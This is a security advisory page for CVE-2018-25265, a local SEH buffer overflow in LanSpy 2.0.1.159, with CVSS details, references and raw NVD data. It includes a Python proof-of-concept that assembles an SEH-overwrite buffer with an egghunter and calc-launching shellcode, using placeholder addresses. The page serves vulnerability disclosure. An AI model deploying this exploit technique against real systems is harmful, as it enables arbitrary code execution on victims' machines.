Security Vulnerability Report
CVE-2018-25265 CVSS 8.4 HIGH

CVE-2018-25265

Published: 2026-04-22 16:16:47
Last Modified: 2026-04-27 17:28:50

Description

LanSpy 2.0.1.159 contains a local buffer overflow vulnerability in the scan section that allows local attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious payloads using egghunter techniques to locate and execute shellcode, triggering code execution through SEH chain manipulation and controlled jumps.

CVSS Details

CVSS Score
8.4 (secondary assessment with PR:N). The primary NVD CVSS 3.1 assessment in the raw data below uses AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H and scores 7.8 HIGH, because it assumes the attacker already holds low local privileges; the CVSS 4.0 secondary vector scores 8.6. Triage against the 7.8 primary score unless your threat model grants unprivileged local code execution.
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lizardsystems:lanspy:*:*:*:*:*:*:*:* - VULNERABLE
LanSpy, all versions up to and including 2.0.1.159 (the CPE match in the raw data sets versionEndIncluding = 2.0.1.159; no fixed version is listed, so treat every installed build as affected until the vendor states otherwise).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It does not interact with LanSpy itself: it only assembles the SEH-overwrite buffer and writes it to exploit.bin. The offset and POP/POP/RET address it uses are placeholders that must be re-derived in a debugger for the exact binary under test, and the embedded shellcode calls a hard-coded absolute address that is only valid for one specific Windows build.
python
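#!/usr/bin/env python3
"""
PoC payload generator for CVE-2018-25265 (LanSpy 2.0.1.159 local SEH overflow).

Builds the byte string that overwrites a structured-exception-handling record
and chains into an egghunter, which then locates the real shellcode elsewhere
in memory.  Nothing here talks to LanSpy: the buffer is only written to
``exploit.bin`` and must be delivered to the vulnerable input by the tester.

Layout produced by :func:`generate_payload`::

    [junk * offset][nSEH: jmp +6][SEH: pop/pop/ret][egghunter][padding][egg][shellcode]

Note: ``offset`` and the pop/pop/ret address are target-specific and must be
determined in a debugger against the exact binary under test.  The values in
``__main__`` are placeholders, not working values.
"""
import struct

# Skape-style 32-byte egghunter (int 0x2e probe, page-aligned via or dx,0xfff /
# inc edx).  It walks memory looking for the tag "w00t" twice in a row
# (mov eax,"w00t"; scasd; scasd) and then jumps to the bytes following it.
# Kept as a str, not bytes, so the existing ``.encode('latin-1')`` usage and
# any external importer of this name keep working unchanged.
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
             "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# Egg tag that the hunter searches for: "w00t" repeated so a single occurrence
# of the 4-byte pattern does not produce a false hit.
egg = "w00tw00t"

# 17-byte stub: xor ecx,ecx / push ecx / push "calc" / push esp /
# mov eax,0x77c293c7 / call eax / int3.  The call target is a hard-coded
# absolute address (presumably kernel32!WinExec from one specific Windows
# build — TODO confirm); it will not survive ASLR or a different kernel32 and
# must be regenerated for the target.  The trailing int3 halts the process
# after the call, which is acceptable for a PoC run under a debugger.
# NOTE(review): the hard-coded address means this is unlikely to be stock
# msfvenom output despite the original comment — verify the origin.
shellcode = ("\x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xc2\x77\xff\xd0"
             "\xcc")


def generate_payload(offset: int, seh_address: int) -> bytes:
    """Return the malicious buffer that overwrites the SEH record.

    Args:
        offset: number of junk bytes before the nSEH field, i.e. the distance
            from the start of the overflowed buffer to the SEH record.  Must be
            non-negative.
        seh_address: 32-bit address of a ``pop; pop; ret`` gadget written into
            the SEH handler slot.  For the overwrite to be usable it has to come
            from a module loaded without ASLR and without SafeSEH.

    Returns:
        ``padding + nSEH + SEH + egghunter + padding + egg + shellcode`` as
        a single ``bytes`` object.

    Raises:
        ValueError: if ``offset`` is negative.  The original code silently
            produced an empty padding in that case, yielding a buffer that
            never reaches the SEH record.
        struct.error: if ``seh_address`` does not fit in an unsigned 32-bit
            integer (propagated from :func:`struct.pack`).
    """
    if offset < 0:
        raise ValueError(f"offset must be non-negative, got {offset}")

    # 1. Junk bytes up to the SEH record.
    padding = b"A" * offset

    # 2. nSEH: short jump 6 bytes *forward* (\xeb\x06), over the 4-byte handler
    #    slot and the two NOPs, landing on the egghunter.
    nseh = b"\xeb\x06\x90\x90"

    # 3. SEH handler slot: POP POP RET gadget, little-endian 32-bit.
    seh = struct.pack("<I", seh_address)

    # 4. Egghunter.  latin-1 maps each code point 0..255 to exactly one byte,
    #    so the str literals above round-trip to the intended raw bytes.
    hunter = egghunter.encode("latin-1")

    # 5. Padding between hunter and egg so the hunter's search has a stable
    #    region to cross (optional, kept from the original layout).
    post_hunter_padding = b"C" * 100

    # 6. Tag followed immediately by the shellcode the hunter jumps to.
    payload_chunk = egg.encode("latin-1") + shellcode.encode("latin-1")

    return b"".join((padding, nseh, seh, hunter, post_hunter_padding, payload_chunk))


if __name__ == "__main__":
    # Placeholder values for demonstration only — both must be re-derived in a
    # debugger against the actual LanSpy 2.0.1.159 binary before use.
    offset = 1000
    seh_addr = 0x10020120

    buf = generate_payload(offset, seh_addr)
    print(f"[+] Generated Payload Length: {len(buf)}")
    print(f"[+] Payload Preview: {buf[:50]}...")

    # The buffer is never sent anywhere by this script; it is written to disk
    # for the tester to feed to the vulnerable LanSpy input.
    try:
        with open("exploit.bin", "wb") as f:
            f.write(buf)
        print("[+] Payload saved to exploit.bin")
    except OSError as e:
        print(f"[-] Error saving file: {e}")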

References

- https://lizardsystems.com (vendor product page)
- https://www.exploit-db.com/exploits/46018 (Exploit-DB entry, tagged Exploit / VDB Entry)
- https://www.vulncheck.com/advisories/lanspy-local-buffer-overflow (third-party advisory)

Weakness: CWE-787 (as listed in the raw data below).

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25265", "sourceIdentifier": "[email protected]", "published": "2026-04-22T16:16:46.907", "lastModified": "2026-04-27T17:28:49.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LanSpy 2.0.1.159 contains a local buffer overflow vulnerability in the scan section that allows local attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious payloads using egghunter techniques to locate and execute shellcode, triggering code execution through SEH chain manipulation and controlled jumps."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lizardsystems:lanspy:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.0.1.159", "matchCriteriaId": "E45C3D70-1AEC-401F-A2BC-AACC0C5F60DD"}]}]}], "references": [{"url": "https://lizardsystems.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46018", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/lanspy-local-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}